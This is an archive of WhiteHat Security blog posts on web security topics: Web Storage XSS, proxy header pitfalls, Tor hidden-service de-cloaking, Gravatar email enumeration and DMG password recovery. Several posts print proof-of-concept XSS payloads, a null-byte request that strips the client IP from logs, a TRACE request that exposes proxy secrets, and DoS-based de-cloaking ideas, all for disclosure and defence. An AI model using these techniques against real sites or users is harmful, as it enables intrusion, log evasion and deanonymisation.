Category Archives: Technical Insight

Web Storage Security

The web waits for no one, not even W3C.

While the HTML5 specification isn’t finalized, and HTML5 Storage has even been broken out into its own Web Storage Specification, which is even further from being finalized, code continues to move to the client and more developers are (mis-) using the next generation features that are already available in the browsers. Engineers and researchers in the WhiteHat Security Threat Research Center are in a unique position to know “where there is code, there are vulnerabilities,” and JavaScript is certainly no exception.

Over the past few months, the Threat Research Center has implemented new checks into WhiteHat Sentinel to better identify and analyze the usage of Web Storage and its potential security impact.  During the course of this research, I analyzed over 600 applications that made at least one call to Web Storage — “getItem” or “setItem”.  The preliminary results may surprise you. They sure surprised me.

Before I jump into the vulnerability discussion, a brief word about some of the so-called “security advice” concerning HTML5 APIs and specifically Web Storage. I’ll be the first to admit that before this project I’d never used the Web Storage APIs; this was a from-scratch effort. Like any good developer (or hacker) learning a new technology, I googled “Web Storage Security”, “localStorage Security”, and “HTML5 Storage Security”. The results were somewhat discouraging.  I couldn’t find a single vulnerable code example and most security commentaries boiled down to either “there is no major risk” or “if developers use Web Storage properly there is no risk.”

The argument is that because stored values aren’t transmitted over HTTP we actually have a more secure option for storing data that is only needed on the client. In my opinion, this is just flat out wrong.  Arguing that “if developers use it correctly there is no risk” is like saying “if PHP developers use $_GET correctly there won’t be any problems.” We all know how that turns out.

So I knew I needed to go to the source. Section 7 of the Web Storage Specification is titled “Security”; certainly we can get some good advice here. Honestly though, I found section 7.1’s warning about DNS spoofing attacks and 7.2’s warning about cross-directory attacks to be a bit hollow. I’m not saying these attacks don’t exist, but certainly we can give some better advice than “Use TLS” and “Don’t implement on shared domains”. Section 7.3, on implementation risks, appears to be entirely targeted at browser makers. If developers can’t go to W3C for advice on how and how not to use Web Storage securely, then where can they go? It looks like we are back to Stack Overflow and random blog posts. With that being the state of security advice on Web Storage, I figured I’d throw my hat in the ring.

Examples of Vulnerability:

Evil Roommate / Public Computer

Firefox’s about:home page is vulnerable to DOM (document object model) XSS via localStorage injection through the snippets functionality. While I can’t send you a link or build a malicious website to exploit this issue I’m willing to bet that thousands of people use FireFox on a shared or public computer every day. It sure would be nice to be able to log all of those keystrokes even after the browser is closed and private data has been cleared.

Screen Shot 2013-05-18 at 5.12.34 AM

Just sit down and run a weaponized version of the following bookmarklet:

javascript:window.localStorage.setItem(‘snippets’,'<iframe src=”https://www.whitehatsec.com” onload=”prompt()” style=”width:100%;height:100%;z-index:9999999;position:absolute;left:0px;top:0px;”/>’);

When contacted about the above issue via email the Mozilla security team advised that they are migrating the functionality off of localStorage for reasons other than security. Even so, I’ll be keeping my Firefox usage to my own computer that is always locked whenever I am not using it. At least until this functionality is patched.

DOMXSS –> localStorage XSS –> The persistent vector your sever will never see.

Vulnerable Code:

<script language=”JavaScript”>

var Id = getPramValue(“id”);

var persistId = localStorage.getItem(‘id’);

if( isValid(Id) ){

document.write(‘<a href=”http://www.example.com/?s=13436&id=’+ Id” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);

document.write(‘</a>’);

} else if( localStorage && isValid(persistId)) {

document.write(‘<a href=”http://www.example.com/?s=13436&id=’+ persistId” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);

document.write(‘</a>’);

}else {

document.write(‘<a href=”http://www.example.com/locator” class=”scroll linktomap” id=”store_locator”>’);

document.write(‘<div>Find Store</div>’);

document.write(‘</a>’);

}

</script>

Proof of Concept:

<a href=”http://www.example.com/#?id=’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>

The String.fromCharCode here just makes it easier to insert the needed injection into localStorage without excessive quote escaping. Here is what it decodes to:

window.localStorage.setItem(‘id’,'”><img/src=\”x\”onerror=alert(1)>’)

The Always and Never of Web Storage

ALWAYS:

Always  validate, encode, and escape user input before placing into localStorage or sessionStorage

Always  validate, encode, and escape data read from localStorage or sessionStorage before writing onto the page (DOM).

Always  treat all data read from localStorage or sessionStorage as untrusted user input.

NEVER:

Never store sensitive data using Web Storage: Web Storage is not secure storage. It is not “more secure” than cookies because it isn’t transmitted over the wire. It is not encrypted. There is no Secure or HTTP only flag so this is not a place to keep session or other security tokens.

Never use Web Storage data for access control decisions or trust the serialized objects you store here for other critical business logic. A malicious user is free to modify their localStorage and sessionStorage values at any time, treat all Web Storage data as untrusted.

Never write stored data to the page (DOM) with a vulnerable JavaScript or library sink.  Here is the best list of JavaScript sinks that I am aware of on the web right now.  While it is true that a perfect storm of tainted data flow must exist for a remote exploit that relies 100% on Web Storage you must consider two alternate scenarios. First, consider the evil roommate, unlocked, unattended, or public computer scenario in which a malicious user has temporary physical access to your user’s web browser. The computer’s owner may have disallowed a low privileged user from installing malicious add-on but I’ve never seen a user prevented from making a bookmark. Second, don’t ignore the possibility of improper Web Storage usage allowing escalation of another vulnerability such as reflective cross-site scripting into persistent cross-site scripting.

“How does WhiteHat Security approach BYOD?”

BYOD is a big topic for companies, particularly when it comes to how to properly implement policy around personal devices used for work purposes. It’s a question that we are asked often by employees and by our customers, so I thought I would take a moment to share a little about our approach to BYOD.

By nature, the work we do at WhiteHat Security involves work with some of our customers most sensitive data and critical assets. We don’t take this lightly. So, we deal with BYOD perhaps a little differently then most companies. Getting access to sensitive customer data is only performed via WhiteHat Security supported hardware and job function. So in a sense, we do not provide outright support for BYOD. If employees or guests do bring their own devices to our offices, they can only access our public wifi, and no WhiteHat Security data or customer data is accessible on that network. We segment our data pretty aggressively to prevent data leakage. Employees that require access to certain mobile devices – smart phones or laptops, for instance - WhiteHat Security will pay for the device and the IT department will configure it for access, but access is limited to email and not customer data.

Tor Hidden-Service Passive De-Cloaking

Someone recently asked me if I knew how to find where Tor-hidden services were really hosted. I identified a few possible methods for finding the origin servers, but none of them worked universally – or even in most situations. Eventually, I did find one way to definitively locate an origin server. However, that method is not trivial – and is still just theoretical.

First, I found the following entry on Tor’s webpage: “If your computer isn’t online all the time, your hidden service won’t be either. This leaks information to an observant adversary.” The following idea then came to mind: Let’s say you have a small army of bots (probably a dozen or so are necessary for the sake of redundancy; basically, the more bots you use, the better) connected to Tor. You’d then need to feed something – like the Internet Health Report – into a central database that the de-cloaking bots can monitor.

Because the Internet can be flaky and regularly has minor outages – sometimes related to routing, and sometimes related to a simple lack of power ­ it’s easy (if you have time) to determine if an outage is the cause of a problem, even on robust cloud infrastructures. Furthermore, some companies (e.g., Keynote) already specialize in tracking outages for you.

De-Cloaking

De-cloaking begins with a few of your robots doing regular polling to make sure your service remains online. This polling is essential for performing tests. When you do discover an outage on the Internet, you should immediately have your robots ­ from Tor nodes around the world ­ attempt to contact the server in question. If just a few of the bots are blocked, it’s likely that they are either just transiting the “broken” network or that the bot is itself on this “broken” network.

 

However, if none of your bots can reach the service in question, there’s a good chance that you’ve found the part of the Internet that’s currently broken. One caveat is that if all of the Introducer nodes lie beyond the path of the disruption it may give a false positive, but this is unlikely unless the outage is extremely close to where the polling robots are, or the outage is extremely large. So false positives are a real possibility, although not enough of a deterrent to make this attack un-viable.

 

This same “contact the server in question” technique can reveal other additional granular/smaller breakages by monitoring for outages within a specific network, then monitoring down to the data center, and possibly even down to the subnet. At the subnet level you’re monitoring a small enough set of machines that one could ­ at least theoretically ­ cause selective minor outages (even a few seconds could do the trick) by using a wide variety of denial-of-service attacks to find the one machine that, when attacked, also makes your bots unable to access the site at exactly the same time the site you are monitoring becomes unresponsive.

Alternatively, if the IP range is small enough, a government agency could simply watch the wire for Tor traffic. That method, however, is painstaking and requires physical interception, and may require a lot of traffic analysis. However, this method could work.
Theoretically, you also could speed up the de-cloaking by looking at the date stamp in the HTTP response of the hidden service. If that service is listening on port 80, you could simply check the dates and then ignore the ones that fail to match the correct time zone/clock skew. Then, unless the problem is deliberate tampering, you’d almost certainly ­ and much more quickly ­ know what’s causing the outages. That is, unless the hidden services are within a VM that fails to use NTP (network time protocol), while the parent does use NTP, or unless both dates were set by hand.

Overall, using a time-stamp to improve de-cloaking is risky, because it could also be a ‘red herring’ – a tricky method used by a hidden Tor service administrator to hide the service further. A similar technique has been discussed before using clock skews of each Tor node and validating that it matches the Tor hidden service to find the origin server. But using clock skews or time-stamps assumes that the hidden service is not within a VM on the host machine, which is a real possibility; therefore, this may not always work.

The concept of a Tor hidden service using multiple machines with the same Tor private key to create a “load balancing” effect to thwart this de-cloaking attack has two issues. The first is that apparently in practice the failover effect can take hours, not seconds. The second is that depending on how the data is mirrored between the two hidden services, it may be extremely easy to tell which server you are communicating with. If something like rsync is used in favor of NFS to mirror content, the inodes on disc and timestamps will be different, leading to different eTag fingerprints and different Last-Modified time stamps, which can be discerned simply by looking at the HTTP headers.

Admittedly, what I’m describing here is just a theoretical attack. A large part of this attack is simply passive recon tied in with some generic polling techniques. However, that is a minor barrier for determined adversaries. This is an attack method that could make it significantly more difficult to perfectly hide a Tor-hidden service from a sophisticated adversary using today’s technology without significant forethought or planning.

Therefore, it is probably unwise ­ without taking additional precautions ­ to run a Tor-hidden service that relies entirely on IP anonymity for safety.

A huge thanks to Tom Ritter, Runa Sandvik, Tim Tomes and Robert Graham for letting me bounce these thoughts off of them.

Simple Vulnerabilities Aren’t Always Simple

In any given application, vulnerabilities can range from a minor case of Information Leakage to major Insufficient Authorization/Authentication, and anywhere in between.  With such a wide range of vulnerabilities it is easy to see how, say, an issue with Insufficient Anti-Automation can be minor.  However, a malicious attacker will more than likely focus on multiple vulnerabilities; this tactic can exploit seemingly minor vulnerabilities and result in a much more dangerous exploit than the sum of its parts.

A Perfect Example

I recently tested an application and almost immediately discovered an Insufficient Anti-Automation vulnerability.  A profile creation page had a CAPTCHA in place to prevent automated creation of accounts, but I found that the CAPTCHA could be bypassed by repeating the same parameters in the POST request.  We’ll say these were named “CAPTCHA_value” and “CAPTCHA_text.”  This vulnerability is normally rated at a Threat/Severity of Critical/Medium; most would consider this a “minor” vulnerability, especially compared to something like SQL Injection or Insufficient Authentication.

Later, testing the same application, I discovered a place I could land reflective Cross Site Scripting; it was in an obscure, hard-to-reach error page, but it was there.  This is a more severe vulnerability than the Insufficient Anti-Automation vulnerability I previously mentioned, but being reflective it was a less-than-stellar find, somewhat difficult to exploit.

Finally, after several hours of testing, I discovered a way to view, and indeed modify, another user’s profile information.  This is a major find, very dangerous in the hands of a malicious attacker, and it was not difficult to exploit.  This major find could be used to plant the aforementioned Cross Site Scripting vulnerability into a user’s profile; suddenly the vulnerability seemed much more potent.   After a little more testing, I determined that it would actually be possible to iterate through user accounts and, utilizing the previous Insufficient Anti-Automation vulnerability, alter their profile information to include a link to the Cross Site Scripting vulnerability.

This chain of vulnerabilities quickly led to an exploit that could potentially destroy the entire business model of this application: imagine finding out that every single user had been attacked simultaneously, at minimum compromising users’ sensitive data, and potentially removing said data or even compromising their accounts through Cross Site Scripting.  Thus, it is clear that apparently “minor” vulnerabilities can be used in combination with more “dangerous” finds to create a truly devastating attack that could compromise an entire application.  Remember, many instances of Insufficient Anti-Automation are considered minor; nevertheless, by exploiting this particular example the entire application could be compromised.

This is exactly the sort of vulnerability that can only be found through manual assessments; an application or source scanner might have found any of these individually, but could never use the human reasoning required to link the three of them together to form an exploit that is far greater than the sum of its parts. Human beings can assess and assign risk accurately: whether an exploit (such as insufficient anti-automation) is apparently “low risk” or not, the actual risk will vary based on information a human reviewer can bring to this process much more reliably than any automated system.

Checklist To Prepare Yourself In Advance of a DDoS Attack

Many people are discussing the latest attacks that have been causing intermittent outages all over the Internet. Unfortunately, distributed denial of service (DDoS) causes massive congestion; and without something upstream close to the attacking machines in question, it can be very difficult to stop the attack.

One thing I find is that many organizations simply have no idea what to do when they are faced with a denial of service attack (DoS), or with it’s big bad brother, the distributed denial of service attack (DDoS). So I created a DDoS Runbook that can be used by companies in advance of any attacks to help them organize how they are to deal with the attack if and when it does occur. The last thing you want to do in the midst of a crisis is try to figure out who runs the infrastructure that’s under attack, or be formulating a last minute crisis management news-letter from scratch.

I highly encourage companies to download it, and make it their own. Modify what makes sense to modify, add or delete what’s missing or doesn’t apply and make sure you have it handy. It’s nice to be able to break glass in case of emergency and have a good plan in place.

Top 3 Proxy Issues That No One Ever Told You

Occasionally I used to get asked to look at web application architecture for companies. Companies that grow above a certain size or threat level often move to using inline caching proxies, inline cloud based WAF solutions (e.g. CloudFlare or Incapsula), or both. For a long time I’ve had a hard time explaining why this could be a problem but I finally ran into a confluence of problems that demonstrate why this is an issue. Let’s start with the major problem.

X-Forwarded-For

When you have a website that needs to use IP addresses, you’ll run into strange situations if you run an inline proxy. The most important issue is that the IP address of the machine connecting to your web server is always that of the upstream proxy/ies and not that of the person connecting. The user connects to the proxy and the proxy connects to your website; therefore, your website always sees the same IP address. IP addresses are used for all kinds of security measures. They’re used for seeding secret strings in cookies in PHP. They’re used for doing flood detection. They’re used for brute force detection and lockouts. IPs are used all the time. But what happens when all the IPs look the same?

To get around that, proxies have invented something called the X-Forwarded-For header, which can look like a lot of random things. It can look like any of the following:

X-Forwarded-For: 192.168.0.5
X-Forwarded-For: 192.168.1.2, 123.123.123.123
X-Forwarded-For: 1.3.3.7
X-Forwarded-For: localhost, 123.123.123.123

Because it’s an optional header it contains random things. Sometimes those things are real IP addresses (sometime internal RFC1918 address space and sometimes public) and sometimes it just contains garbage. Either way, most proxies have decided that the X-Forwarded-For header is the best header to use to tack on their information. So they tack the IP address of the user who is connecting to them onto the end of the string that they receive (or create a new string if there isn’t one already) and pass that to the web-server.

The web-server then has to be smart enough to take that information and parse apart the string to grab the last IP address and intelligently replace the IP address of the proxy with the IP address listed in the X-Forwarded-For header. Inline devices that sit behind the proxy have to be just as smart. This leads to all kinds of weird scenarios where an attacker can spoof IP addresses by sending X-Headers after having breached the network, but that is less likely.

rpaf

To accomplish this goal of looking at the X-Forwarded-For header, many people turn to rpaf, which performs this task very easily. The problem is that if rpaf doesn’t see the header it doesn’t know what IP address to use, and it will instead default to nothing. So how do we get the inline proxy to send something that rpaf won’t understand? Simple: we use a null byte (here shown as %00 below so you can visualize it, but normally it is not URL encoded):

GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
X-Forwarded-For%00: whatever

This will create a 400 error, because Apache doesn’t understand the request. However, the most important thing is what it looks like in the logs. Notice that in the first log file there is an IP address, and in the second there’s no IP address:

Mar 17 20:05:46 123.123.123.123 – - [17/Mar/2013:20:05:46 +0000] “GET / HTTP/1.1″ 200 15 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″

Mar 17 20:06:10 – - – [17/Mar/2013:20:06:10 +0000] “GET / HTTP/1.1″ 400 56 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″

An attacker’s mileage my vary depending on how the proxy treats the header with a null byte in it. Still the proxy may do its own logging, which may render this attack useless. The most dangerous variant would be if an attacker can simply bypass the cloud based WAF solution and go directly to the origin server. By bypassing the WAF the attacker doesn’t have to worry about how the proxy handles the null byte or any extra logging it may perform.

400 errors

Why would an attacker intentionally want to send a request that creates a 400 error? There are lots of potential reasons. A few of the fine folks on Twitter suggested the following:

  • Fingerprinting the operating system
  • Filling up the logs
  • Using the user-agent to seed the system logs with a remote file include
  • Using the user-agent to seed the system to create XSS attacks in log parsers
  • Distraction from another attack

There may be many additional reasons that a request that creates a 400 error may be useful, but the point is that as a result there’s no IP address associated with the request in the logs in Apache.

Obfuscation

Sometimes proxies may communicate very sensitive information to the server, so that the server knows that it’s talking to the right thing. These secrets can be just about anything. Let’s say for instance that knowing that secret would allow you to contact the server directly and it would believe you are the proxy. Then let’s say the proxy and the web server decide to use another X header instead of X-Forwarded-For to obfuscate it so that an attacker may not know what the real header is – then the attacker will be unable to spoof another IP address.

Here is where TRACE comes back to haunt us. The HTTP method TRACE comes back once every few years to cause problems, and for some reason it’s still enabled by default more times than not. With TRACE an attacker can see what they sent to the server. But because they are not connecting directly to the server but instead to the proxy, what the attacker really sees is what the proxy is sending to the web server. Here’s what it might look like:

TRACE / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 22:05:22 GMT
Server: Apache
Content-Type: message/http
X-Secret-info: lkjfalkjsfoij2oif4oijalskdfjsecretstringgoeshere12342134
Obfuscated-Client-Ip: 123.123.123.123
Content-Length: 348

So relatively easily the attacker now knows the secret and the obfuscated header that the web server is using as a replacement for IP addresses. Assuming the web server allows inbound connections from the Internet and the real IP address of the web-server can be found out, the attacker can now communicate to the web-server as if they were another IP address. This is not an ideal scenario. So at an absolute minimum, disabling TRACE is a really important and easy step to take. But doing forensic logging which doesn’t rely on rpaf or other tricks to figure out IP address from alternate HTTP headers is also a good idea.

Special thanks to @gmanfunky @dan_crowley @ivanristic @dallendoug @cgkades @desi_juggaad and @therealsaumil for the help with uses for 400 errors!

Gravatar Email Enumeration in JavaScript

A friend recently reminded me about a hackers’ trick − based on using Gravatar − that I’d long forgotten about. The method was last discussed  on Stack Overflow a couple of years ago. Lately, people have been thinking again about this problem. And although the discussion has mostly been about how to brute force email addresses from a known Gravatar URL, there is a way to perform much more efficient and larger-scale brute force attacks with Gravatar.

The problem

This issue stems from four main factors:

  1. Gravatar uses the MD5 hash of a user’s email address to display the Gravatar image
  2. Gravatar allows website authors to display no image at all if they’d rather not
  3. Because of a minor issue in the browser’s origin policy, there is a way for an attacker to calculate an image size remotely
  4. Companies, and people, often use email addresses closely related to their actual name

The attack

By combining these four factors, I created a small script to demonstrate that an attacker can embed in their webpage. By supplying the first name, the last name (and, optionally, a middle initial), and the domain name, you can write a small piece of JavaScript that performs the cracking in the user’s own browser.

So imagine this: In the simplest − and mostly impractical − example, an attacker gets people to visit a site, and then enters their first and last name, a well as their company’s name (let’s say “Safeway”). A malicious website then programmatically adds “.com” to the end of the string. Assuming, at least in most cases, that the “.com” successfully produces the correct domain name (in this case, “Safeway.com”), the browser then concatenates the first name, last name, and domain name in various ways. The browser also tries Gmail, Outlook, Hotmail, and AOL, as these are the most common webmail providers.

Once a user’s browser visits the malicious website, the JavaScript forces the browser to pull in images from Gravatar. If an image is invalid, the size of the image in the browser will be less than one pixel in either dimension. However, if the image does exist, its size in the browser will be greater than zero, which confirms for the attacker that the email address is valid. A semi-benign example of this attack could be used during the registration process of a website, in order to speed up the collection of email addresses, and/or by providing a drop-down menu of probable email addresses.

The risks

This simple brute force method can then lead to far more efficient and practical attacks that produce massive amounts of email addresses of the target domain. For instance, let’s say an attacker gathers a dictionary containing thousands of common first names, last names, and the target domain name(s) in question (or the top Alexa 1000 domains, if this is an untargeted campaign). Instead of spamming chosen email addresses arbitrarily, an attacker can run the same JavaScript he’s already written (either on his own or by someone else on his behalf) to collect massive numbers of valid email addresses.

And if the attacker can have a random browser on the Internet do this recon on his behalf, this brute-force attack is performed without sending a single request to Gravatar. This technique also works successfully without requiring a massive spam campaign to identify valid user accounts.

I’ve created an embeddable example here which demonstrates this enumeration.

Once discovered, this is not an easy problem to fix, because so many people and sites use Gravatar, and it would require a forklift upgrade of their code to use something more secure than a simple MD5 hash. Therefore, it is probable that this issue will continue to exist for a long time – certainly as long as Gravatar exists and provides the features it currently offers. The result is the possibility of large-scale, spear-phishing campaigns against large corporations. Therefore, WhiteHat’s Threat Research Center recommends that corporate Internet users limit their employees from using Gravatar tied to their corporate email addresses when conducting company-specific business.

 

 

 

 

WhiteHat Sentinel Infrastructure, by the Numbers

IMG_0770WhiteHat Sentinel has assessed well over 12,000 websites for vulnerabilities across 500 companies. For context, getting to our first 1,000 websites took four years. Today, we’re onboarding at least 1,000 per month.

The infrastructure’s concurrent scan average is roughly 2,100 with peaks reaching 3,374. Currently, these vulnerability scans generate 256 million HTTP requests per month. This traffic crosses over redundant 1GB Internet connections and has uncovered nearly 100,000 separate website vulnerabilities between 2006 and 2012. Collectively we index billions of URLs annually. Think Googlebot, but logged-in. To top it off, we log each and every HTTP request / response combo, with full headers, for every scan, on every website.

As you can see, mass scanning websites for vulnerabilities is highly disk intensive. That’s why Sentinel’s infrastructure has 220TB worth of clustered storage arrays, plus an additional 32TB in Virtual shared storage. This storage space is split up among 12 master databases and 12 standby databases (one for each master database for full tolerance), and each consumes about 20GB per week. 2TB of new data is being written to the NFS cluster every week.

We also have heavy server requirements. While we recommend Sentinel customers scan their websites continuously to minimize coverage gaps, current schedules are weighted towards commencing Thursday and Friday, extending over the weekend, and pause/complete by the Monday e-commerce rush. This of course is local time for the customer, and we do provide services for the entire planet! Monday morning is typically when customers analyze their most recent Sentinel vulnerability findings, integrate our results into their bug tracking system, and generate customized reports for the week’s meetings.

IMG_0772

For efficiency, Sentinel’s infrastructure must be smart of enough to automatically provision Scan Servers and Reporting Servers. To accomplish this we leverage virtualization on top of several clusters of blade chassis, which allow us to control resource allocation between multiple scanning instances and load balanced front-end & back-end reporting Web servers. As new scans kickoff, as defined by their schedule, Scan Servers dynamically appear to handle the load. We’ve had as many as 64 Scan Servers running at once. As scans taper off, unnecessary Scan Servers vanish, freeing up their CPU / memory resources for the Reporting Servers. When we need additional server capacity, we add additional blades or an entire new blade chassis.

Next we could describe all the various networking gear, routers, switches, and firewalls, which bind everything together. The reality is we’re not comfortable sharing out that information publicly. What we can say is the entirety of the system passed a BITS/ISO27002 Shared Assessment compliance audit. Beyond that, you’ll need to sign a non-disclosure agreement.

Its safe to say the Sentinel infrastructure is rather sophisticated and contains a lot of moving parts. All told, our IT team monitors 162 hosts and over 1,300 services in production. They keep a close eye on utilization of network, CPU, memory, uptime, latency, etc. ensuring everything runs smoothly 24 hours of the day, 7 days a week, 365 days a year.  With rare exception, Sentinel’s entire infrastructure is redundant. Pull any network cable, push any power button, and the system keeps hacking away — so to speak.

IMG_0762

All of this heavy metal is connected together via dual 10GB backplane ethernet and housed in 5 fully utilized 42U racks (expanding into racks 6 and 7 shortly). Since the data we’re responsible for is highly sensitive, to the say the least, the racks are physically located in SSAE16 SOC 1, and soon to be FedRamp certified, state-of-the-art colocation facility. At the Colo, security guards are always onsite. Then there are digital video recorders, false entrances, vehicle blockades, bulletproof glass/walls, unmarked buildings, and person-traps authenticating only one person at a time. Access to our cage requires an appointment, government issued ID, biometric scan, and only then do they hand over the key.

Building the Sentinel infrastructure has taken us years, millions and millions of dollars, countless all nighters and precious hair follicles. It is something we’re extremely proud of and confident in. Nothing else like it, or even close to it, exists. And it’s always getting better, always being improved upon. When your mission is scanning every website on the Internet for vulnerabilities, making them measurably more secure, such a physical infrastructure is just one of the things you need. When we say “scalable,” this is what we mean.

IMG_0764

 

 

Password Cracking AES-256 DMGs and Epic Self-Pwnage

jeremiahTwo weeks ago I was in the midst of a nightmare. I’d forgotten a password. Not just any password. THE password. Without this one password I was cryptographically locked out of thousands and gigabytes worth of files I care about. Highly sensitive and valuable files that include work documents, personal projects, photos, code snippets, notes, family stuff, etc. The password in question unlocks these files from the protection of locally stored AES-256 encrypted disk image. A location where an “email me a password reset link” is not an option. File backups? Of course! Encrypted the same way with the same password. Password paper backup? Nope. I’ll get to that. I somehow needed to “crack” this password. If not, the amount of epic self-pwnage would be too horrible to imagine.

Before sharing how I got myself into this predicament, it’s necessary to reveal some details about my personal computer security habits. More specifics than I’m normally comfortable sharing.

badgewall2As my badge wall shows, I travel a lot, all around the world, and often with the same laptop. A MacBook Pro. My computer becoming lost, stolen, or imaged by border guards and other law enforcement officers is a constant concern. To protect against these potential physical attacks, OS X dutifully offers FileVault.

FileVault is a full disk encryption feature utilizing XTS-AES 128 crypto. Enabling FileVault means that even if someone has physical possession of my computer, or obtains a full copy of the hard drive, they’d be the proud new owner of a cutting-edge machine, but unable to get any useful data off of it. That is unless my admin password, which unlocks FileVault, is ridiculously simple, and it isn’t. By all practical means, “cracking” this password is impossible.

What is possible is law enforcement, or a robber, forcibly stopping me and “asking” for my admin password, a method capable of defeating FileVault’s full disk encryption. Realistically, while my brazilian jiu-jitsu black belt certainly helps in many situations, it can be utterly useless in other real-world encounters. I’ll of course resist giving up my admin password to the extent I’m able, but must assume I may have to “comply” at some point. If this should happen, ideally my data, other than email, should remain safe even after the adversary lands on my desktop.

Setting up this type of layered security fall-back plan is where we return to the conversation of encrypted disk images. On OS X, Disk Utility can be used to create encrypted disk images called DMGs. DMGs are self-contained portable files, of customizable size, that when mounted (i.e. double-clicked) display on the desktop like any other disk drive where files can be stored.

Upon creation of DMGs the level of encryption strength can be set, the highest being AES-256. If FileVault’s AES-128 crypto is already “impossible” to crack, AES-256 DMGs are exponentially more impossible. To ensure this, all you have to do is set a reasonable password. We’re talking even 6 characters or longer, some upper and lower case, and maybe toss in a digit and special character. DON’T SAVE THE PASSWORD IN YOUR KEYCHAIN. Doing so defeats the entire purpose of what we’re trying to accomplish, because the admin password unlocks the keychain.

A great thing about DMGs is that they can be stored anywhere. Hidden in some obscure directory on the local machine, a network storage device, a USB drive, whatever. All my confidential files are typically stored this way, in a series of encrypted DMGs with separate passwords. Also very important, DMGs containing sensitives files are only mounted on an as-needed basis. This is for two reasons:

  1. If I must hand over my admin password, the person now on the desktop should still have a difficult time learning these disk images exist and a password is required to open them. As they begin to snoop around, image the drive, run forensics, etc., they should feel they have the keys to the kingdom. If they do manage to find the DMGs, hopefully by then I’m on my way and seeking legal help.
  2. Should my computer get “hacked,” a remote attacker will find it extremely difficult to transfer out many many gigabytes worth of data as a single DMG file before being noticed, the computer loses its connection to the Internet, or the image is unmounted.

security

Credit: http://xkcd.com/

What’s also cool is a DMG can be used to store additional account passwords, flat file style. Passwords, which can be made super strong and don’t have to be committed to memory. Simply copy-paste as necessary. This FileValue / DMG setup makes it very convenient to only have to remember a small hand full of passwords, including the admin password, to access everything important and without sacrificing security. Well, convenient up until the point where you forget a DMG password. In my case, caused by my scheduled ritual of “change all my passwords.” Ugh!

I wake up once upon a recent morning and begin my daily routine. Check calendar. Check email. Checks RSS. Check Twitter. Start working, start reading. As is common, I mount a DMG and am greeted by the familiar password dialog.  First password attempt, fail. Second attempt, fail. Third attempt, fail. Warning dialog appears. That’s weird, I thought. Normally I’m a proficient touch typist. Am I’m fat-fingering the password? Three strikes and I’m out again.

Annoyed, but not concerned. Check the caps lock key. Nope. Try the password again. Fail, fail, fail. Fail, fail, fail. Rinse, repeat several more times. WTF! Am I at least trying to type the correct password for the DMG? I believe so. Let me try a few “shouldn’t work passwords” just in case Morning Brain is causing problems. A few dozen password fails later, annoyance begins constricting into panic. It’s OK, consoling myself, I’ll come back to this in a little while. It’ll be fine. I have some non-DMG-required work to complete anyway.

An hour later, I repeated the same password attempt cycle. No dice. The password fails mounting up are now in the hundreds. I start to mouth some obscenities and my keyboard is really not liking the pounding. My wife is beginning to eyeball me with concern. I’m running out of ideas of what that problem could be. That’s about when I recalled recently changing all my passwords. A few moment laters, that’s when it hit me, like really hit me. For whatever reason, I’d forgotten what I changed the password to. *Gulp*. Oh, no!

password_strength

Credit: http://xkcd.com/

Think positive, think optimistic. Keep calm. Carry on. It’ll come to me. I’ve never forgotten these passwords before. I even remember most of it. At least, I think I do.

I’m periodically trying different passwords throughout the day, throughout out the evening. One day turns into two, two into three. All like the first. Only now I’m losing sleep. I’m waking up in the middle of the night and have to try a few more passwords just so I can get back to sleep. For those who don’t know, dreaming of password combinations sucks. What also sucks is without access to this DMG, more specifically the work documents within it, my daily productivity plummets.

Finally, after nearly a week I have to admit to myself, I forgot it. That I’m in trouble. Time for Plan B. Google.

I begin searching around for DMG password cracking tools. My thought is since I have a partial password, I should be fine. Most of the results pages are littered with people responding by cracking jokes when asked about cracking DMG AES crypto. That’s not very encouraging. Then I come across something called crowbarDMG, which is basically a GUI for command:

>$ hdiutil attach -passphrase <passphrase> DiskImage.dmg 

hdiutil locks a DMG file when attempting to mount it, so crowbarDMG runs single threaded, which essentially means a cracking speed of 1 password c/s. Yeah, slow. For my particular circumstance, this was fine. I figured I was only missing between 1 – 3 characters of the password anyway. A day of cracking, maybe two, and I’d be back in business. It was not to be. Then my fuzzy memory suggested I might be missing as much as 6 characters. If that be the case, by sheer math, at least multiple  decades worth of cracking would be necessary at current speed. Time for Plan C. Twitter.

Having ~15,000 followers interested in computer security has its perks. Through the years I’ve come to expect a good percentage of them have a stinging sense of humor. Similar to the Google search, 99% of the responses received were sarcastic. This included one such retort from a friend who works in law enforcement computer forensics. I’m sure some tweets were funny, but I was in no laughing mood. I was freaked. A sense of futility and finality was setting in.

That was until Solar Designer, gat3way, Dhiru Kholia, and Magnum, the guys behind the infamous John the Ripper (JtR) password cracker answered my plea. Then Jeremi Gosney of Stricture Consulting Group graciously offered up the use of his mega hash cracking computing resources as well. You remember Stricture from their Ars article, they have an insane “25-GPU cluster cracks every standard Windows password in < 6 hours.” Collectively, these guys are the amongst the world’s foremost experts in password cracking. If they can’t help, no one can. No joking around, they immediately dove right in.

Now, I couldn’t just share out my DMG for others to attempt to crack. Its enormous size basically precluded that. But even if I could, I wouldn’t. Given the sensitive nature of the data, I actually preferred the data lost than suffer any risk of a leak. Fortunately, JtR has something called dmg2john. dmg2john scrapes the DMG and provides output which can be cracked with JtR by others without putting the data at risk. Nice! Unfortunately, when I got there, dmg2john and JtR were broken when it came to DMGs. I provided the bug details to john-dev and john-users mailing list to replicate. The JtR developers had the issues fixed in a couple days. These guys are awesome.

